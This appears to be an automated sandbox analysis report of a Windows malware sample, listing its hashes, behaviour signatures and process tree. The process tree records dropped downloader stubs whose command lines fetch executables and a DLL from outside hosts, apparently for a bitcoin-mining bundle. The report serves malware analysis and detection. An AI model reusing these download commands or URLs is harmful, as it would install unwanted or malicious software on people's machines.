Analysis
-
max time kernel
0s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31/12/2023, 04:44
Static task
static1
Behavioral task
behavioral1
Sample
28ac188adae3e90b506898cc9fab4699.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
28ac188adae3e90b506898cc9fab4699.exe
Resource
win10v2004-20231215-en
General
-
Target
28ac188adae3e90b506898cc9fab4699.exe
-
Size
492KB
-
MD5
28ac188adae3e90b506898cc9fab4699
-
SHA1
4f31e191eaf870d9971ddde8d339430ebf6381ab
-
SHA256
47b4d7f0e8fbacadab4dd8259443904935e38cc89abe7f10c9d8d9b2950c6f16
-
SHA512
31bf9c81191e38fd89d89b024e0a1835a6c72fe6337395636b674858fe05e976fa84b53405e9420698236e3a0724dd2f12cac3443ac708b331c991ecdadef025
-
SSDEEP
6144:Cuk4fqjksQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:44fwX6peEUBwXVwM9vylzdYvH7AwC
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
pid Process 5004 downloaderSTUB.exe 2380 downloaderSTUB.exe 232 downloaderSTUB.exe 4248 downloaderDDLR.exe 2052 downloaderOFFER0.exe 4432 preinstaller.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4988 wrote to memory of 5004 4988 28ac188adae3e90b506898cc9fab4699.exe 26 PID 4988 wrote to memory of 5004 4988 28ac188adae3e90b506898cc9fab4699.exe 26 PID 4988 wrote to memory of 5004 4988 28ac188adae3e90b506898cc9fab4699.exe 26 PID 4988 wrote to memory of 2380 4988 28ac188adae3e90b506898cc9fab4699.exe 25 PID 4988 wrote to memory of 2380 4988 28ac188adae3e90b506898cc9fab4699.exe 25 PID 4988 wrote to memory of 2380 4988 28ac188adae3e90b506898cc9fab4699.exe 25 PID 4988 wrote to memory of 232 4988 28ac188adae3e90b506898cc9fab4699.exe 24 PID 4988 wrote to memory of 232 4988 28ac188adae3e90b506898cc9fab4699.exe 24 PID 4988 wrote to memory of 232 4988 28ac188adae3e90b506898cc9fab4699.exe 24 PID 4988 wrote to memory of 4248 4988 28ac188adae3e90b506898cc9fab4699.exe 23 PID 4988 wrote to memory of 4248 4988 28ac188adae3e90b506898cc9fab4699.exe 23 PID 4988 wrote to memory of 4248 4988 28ac188adae3e90b506898cc9fab4699.exe 23 PID 4988 wrote to memory of 2052 4988 28ac188adae3e90b506898cc9fab4699.exe 22 PID 4988 wrote to memory of 2052 4988 28ac188adae3e90b506898cc9fab4699.exe 22 PID 4988 wrote to memory of 2052 4988 28ac188adae3e90b506898cc9fab4699.exe 22 PID 4988 wrote to memory of 4432 4988 28ac188adae3e90b506898cc9fab4699.exe 21 PID 4988 wrote to memory of 4432 4988 28ac188adae3e90b506898cc9fab4699.exe 21 PID 4988 wrote to memory of 4432 4988 28ac188adae3e90b506898cc9fab4699.exe 21
Processes
-
C:\Users\Admin\AppData\Local\Temp\28ac188adae3e90b506898cc9fab4699.exe"C:\Users\Admin\AppData\Local\Temp\28ac188adae3e90b506898cc9fab4699.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\preinstaller.exeC:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\preinstaller.exe 0 "Type_o_negative-the_best_of_type_o_negative-cd-2006-qtxmp3" "Download"2⤵
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderOFFER0.exeC:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\optimizer.exe"2⤵
- Executes dropped EXE
PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderDDLR.exeC:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\DirectDownloaderInstaller.exe"2⤵
- Executes dropped EXE
PID:4248
-
-
C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\updater.exe"2⤵
- Executes dropped EXE
PID:232
-
-
C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\OpenCL.dll"2⤵
- Executes dropped EXE
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\stub.exe"2⤵
- Executes dropped EXE
PID:5004
-